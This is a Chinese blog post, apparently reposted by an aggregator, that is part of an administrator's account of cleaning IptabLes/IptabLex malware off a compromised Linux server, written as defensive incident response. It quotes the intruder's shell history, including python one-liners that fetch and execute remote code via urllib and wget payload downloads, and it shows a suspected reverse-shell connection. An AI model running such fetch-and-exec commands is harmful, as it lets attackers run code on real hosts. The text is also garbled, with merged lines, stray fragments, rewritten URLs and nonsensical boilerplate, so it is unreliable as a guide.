小记IptabLes和IptabLex病毒清理过程(3)

来源：互联网时间：2026-02-26 16:38:46 作者：

系统大全为您提供
　

通过netstat -anput 发现这个进程的功能应该是    TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)。
tcp        0      1 这里是我的IP:41939       222.34.129.154:2804         SYN_SENT    1701/bash
这尼玛好像就是反弹shell吧。
还是看看.bash_history吧。
    973 find -name '*tomcat*'
    974 find -name 'index.jsp'
    975 ------------------------------
    976 find -name 'index.jsp'
    977 ls
    978 top
    979 ls
    980 python -c "exec(__import__('urllib').urlopen('https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569489.read())" -m 50br     981 python2
    982 python
    983 ls
    984 wget https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569490.bz2br     985 wget www.baidu.com
    986 cat index.html
    987 wget https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569490.bz2br     988 wget https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569491.bz2 --no-check-certificatebr     989 ls
    990 tar -jxvf Python-2.7.tar.bz2
    991 cd p
    992 cd Python-2.7/
    993 dir
    994 ./configure
    995 make
    996 make install
    997 python -c "exec(__import__('urllib').urlopen('https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569489.read())" -m 50br     998 python -c "exec(__import__('urllib').urlopen('https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569492.read())" -m 50br     999 pip
   1000 yum install python-zlib
他先安装了python，然后去那个URL下了个脚本，网站看了下，是个hack网站，那就是提权和做后门了吧。想再看看还有什么的时候发现只能保存1000行！！！！！
tail –100

ar/log

cure
看看安全信息，有公网IP拼命的在尝试root的密码，而且走的是ssh进来的。当然关闭ssh相信应该是可以的。我这因为目前公网上还需要用到ssh，所以只能在hosts.deny上进行阻止该公网IP进来。

　　东北大学网络中心有常见的ssh攻击的IP地址，及一个sh脚本：
　　网址：https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569493.phpbr 阻止别人的ssh连接了，但是内部的那个进程还是一直有，一直发着这个
TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)
他应该用的应该是Struts2的漏洞进入服务器里的，但是留下的那个后门，我现在还没有办法解决，
Struts2的漏洞可以看这里：
https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569494.htmlbr 至此，先到这里吧。最近还是再看看吧。　　
以上就是系统大全给大家介绍的如何使的方法都有一定的了解了吧，好了，如果大家还想了解更多的资讯，那就赶紧点击系统大全官网吧。

本文来自系统大全https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569495